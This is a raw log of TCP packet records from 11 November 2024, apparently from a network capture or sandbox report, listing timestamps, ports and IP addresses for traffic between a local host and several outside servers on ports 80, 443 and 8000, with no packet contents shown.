Nov 11, 2024 18:13:01.419625998 CET	80	49713	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:01.419707060 CET	49713	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:01.421381950 CET	49713	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:01.426610947 CET	80	49713	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:01.426662922 CET	49713	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:01.448962927 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:01.449028015 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:01.552536964 CET	80	58860	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:01.552553892 CET	80	58860	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:01.552614927 CET	58860	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:01.608189106 CET	80	58861	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.608258009 CET	58861	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.608500957 CET	58861	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.613244057 CET	80	58861	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.613255024 CET	80	58861	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.614522934 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.614557981 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.614638090 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.631067991 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.631089926 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.668836117 CET	80	58862	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:01.668890953 CET	58862	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:01.671534061 CET	58862	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:01.675637960 CET	80	58862	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:01.675707102 CET	58862	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:01.676198959 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:01.676302910 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:01.676798105 CET	80	58862	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:01.690016031 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:01.690056086 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:01.690121889 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:01.690787077 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:01.690798998 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:01.724492073 CET	80	58864	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:01.724545956 CET	58864	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:01.724760056 CET	58864	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:01.729504108 CET	80	58864	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:01.813885927 CET	80	58865	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:01.813899994 CET	80	58865	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:01.813942909 CET	58865	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.813973904 CET	58865	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.814441919 CET	58865	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.814517021 CET	58865	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.823254108 CET	80	58861	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.823337078 CET	58861	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.832480907 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:01.832545042 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:01.837670088 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:01.842832088 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:02.076399088 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.076499939 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.152065992 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:02.152151108 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:02.202214003 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:02.202307940 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:02.274029970 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:02.274029970 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.274060011 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:02.274080992 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.274403095 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:02.274446011 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.274478912 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:02.274507046 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.278507948 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:02.278958082 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.319335938 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.319345951 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:02.572462082 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.572515011 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.572530985 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.572545052 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.572557926 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.572561026 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.572618961 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.572626114 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.572743893 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.572997093 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.573077917 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.653614998 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.653729916 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.653825045 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.653894901 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.655503035 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.655513048 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.655553102 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.655607939 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.655607939 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.655621052 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.655668020 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.656461954 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.656541109 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.735255957 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.735321045 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.735368013 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.735374928 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.735424042 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.735424042 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.735893965 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.735929966 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.735955954 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.735963106 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.736006021 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.736013889 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.736016989 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.736033916 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:02.736068964 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.736068964 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.737019062 CET	58866	443	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:02.737032890 CET	443	58866	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:03.080916882 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.080964088 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081003904 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081011057 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.081011057 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.081026077 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081068039 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081089020 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.081096888 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081106901 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.081147909 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.081151962 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081218004 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.081398964 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081460953 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.081465960 CET	443	58867	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.081510067 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.082319021 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.082319021 CET	58867	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.097882986 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.102665901 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.442421913 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.442544937 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.454704046 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.454752922 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.454828024 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.455142021 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.455158949 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.832278013 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832324982 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832339048 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832366943 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.832397938 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832411051 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832427025 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832431078 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.832439899 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832469940 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.832612991 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.832638025 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832659006 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832762957 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.832813978 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.832839012 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.837711096 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.837824106 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.837857008 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.837907076 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.906321049 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.906467915 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.908350945 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.908368111 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.908665895 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.908921003 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.909179926 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:03.913466930 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913486004 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913500071 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913533926 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.913604975 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913616896 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913633108 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913644075 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.913644075 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913644075 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.913664103 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.913693905 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.913991928 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.914449930 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914470911 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914483070 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914511919 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.914526939 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.914736986 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914757013 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914772034 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914802074 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.914829016 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914843082 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.914863110 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.914999008 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.915652990 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.915664911 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.915678024 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.915703058 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.915715933 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.915724039 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.915724039 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.915745974 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.915793896 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.916472912 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.916623116 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.918333054 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.918355942 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.918384075 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.918467999 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.918540955 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.918560028 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.918685913 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.955338955 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:03.994559050 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.994860888 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:03.994925976 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:03.995055914 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:04.769957066 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770003080 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770028114 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770052910 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770082951 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770107031 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770123005 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.770138979 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770153046 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.770174026 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.770179987 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.770534039 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770566940 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.770571947 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.770613909 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.774703979 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.778750896 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.816706896 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.816754103 CET	443	58868	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:04.816806078 CET	58868	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:04.871040106 CET	58870	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:13:04.875910997 CET	80	58870	13.248.169.48	192.168.2.6
Nov 11, 2024 18:13:04.876122952 CET	58870	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:13:04.880290985 CET	58870	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:13:04.885122061 CET	80	58870	13.248.169.48	192.168.2.6
Nov 11, 2024 18:13:05.058904886 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:05.064062119 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:05.064225912 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:05.069365025 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:05.074115038 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:05.193986893 CET	58874	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:05.198831081 CET	80	58874	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:05.199018955 CET	58874	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:05.200031042 CET	58874	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:05.204936028 CET	80	58874	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:05.642127037 CET	80	58870	13.248.169.48	192.168.2.6
Nov 11, 2024 18:13:05.642224073 CET	58870	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:13:05.643543959 CET	58875	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:05.646051884 CET	80	58870	13.248.169.48	192.168.2.6
Nov 11, 2024 18:13:05.646125078 CET	58870	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:13:05.646775961 CET	80	58874	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:05.646789074 CET	80	58874	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:05.646846056 CET	58874	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:05.648644924 CET	80	58875	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:05.649034023 CET	58875	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:05.657099962 CET	58875	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:05.662075996 CET	80	58875	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:05.662957907 CET	58874	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:05.669775009 CET	80	58874	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:05.674767971 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:05.679614067 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:05.679676056 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:05.679856062 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:05.685316086 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:05.769691944 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:05.769790888 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:05.776951075 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:05.776982069 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:05.777457952 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:05.777793884 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:05.777806997 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:06.077861071 CET	80	58875	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:06.077940941 CET	58875	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:06.082874060 CET	58875	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:06.084538937 CET	80	58875	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:06.084589005 CET	58875	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:06.087717056 CET	80	58875	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:06.350502014 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:06.350578070 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:06.359952927 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:06.359972000 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:06.360264063 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:06.360321045 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:06.360677958 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:06.407331944 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:06.462517977 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:06.462606907 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:06.495817900 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:06.500885963 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:06.500971079 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:06.501164913 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:06.505947113 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:07.289659023 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:07.290726900 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:07.500108957 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:07.505074024 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:07.771686077 CET	80	58877	103.150.10.48	192.168.2.6
Nov 11, 2024 18:13:07.771923065 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:13:07.781213045 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:07.786101103 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:08.078102112 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078150988 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078176975 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.078181982 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078206062 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078218937 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.078228951 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.078243971 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.078248024 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078286886 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.078290939 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078349113 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.078352928 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078388929 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.078526020 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.078560114 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.079375982 CET	443	58879	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.079426050 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.081779957 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.081804037 CET	58879	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.083502054 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.088529110 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.089905024 CET	8000	58882	106.15.232.163	192.168.2.6
Nov 11, 2024 18:13:08.089962959 CET	58882	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:13:08.496052980 CET	80	58871	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.496238947 CET	58871	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.502126932 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.502152920 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.502242088 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.502536058 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.502547026 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.935086966 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.935183048 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.937166929 CET	58899	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:08.937179089 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.937524080 CET	443	58899	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:08.937609911 CET	58899	443	192.168.2.6	188.114.96.3
